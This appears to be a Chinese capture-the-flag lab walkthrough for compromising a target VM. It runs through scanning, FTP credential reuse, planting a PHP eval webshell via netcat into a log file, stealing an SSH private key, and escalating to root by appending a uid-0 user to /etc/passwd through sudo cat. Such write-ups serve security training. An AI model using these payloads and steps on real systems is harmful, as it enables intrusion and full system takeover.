靶机配置

kali配置

虚拟网络适配器配置

不行的时候关闭虚拟机，多点几次生成

主机发现和端口扫描

主机发现

arp-scan -l

端口扫描

端口扫描发现21，22，80端口开放

nmap -sV -A -T4 192.168.2.120

访问80端口

http://192.168.2.120/

查看页面源码

发现账户密码

猜测是ftp的用户和密码

ftp连接

ftp 192.168.2.120

ls

下载并读取文件

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

查看1.php文件

是个html文件，尝试将其源文件拼接在网页访问

http://192.168.2.120/logs/backup_log.php/

尝试在日志文件写入木马，参考了一下其他文档，需要利用10001端口

nc -nv 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看敏感文件

/etc/passwd

双击进入

因为有ssh服务，就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

下载id_rsa文件到本地再拖到kali

赋予id_rsa读写权限

chmod 600 id_rsa

ssh登录

ssh -i id_rsa hbeale@192.168.2.120

修改config文件

cd ~/.ssh
vim config

添加以下信息

Host *HostKeyAlgorithms +ssh-rsa

要是有这个报错的话（sign_and_send_pubkey: no mutual signature supported）

将以下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

ssh连接

ssh -i id_rsa hbeale@192.168.2.120

创建用户密码

openssl命令生成密码

openssl passwd 123456

创建用户，创建完成后Ctrl+c退出

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

切换用户，查看是否提权成功

su aroot
密码：123456
id
whoami

提权成功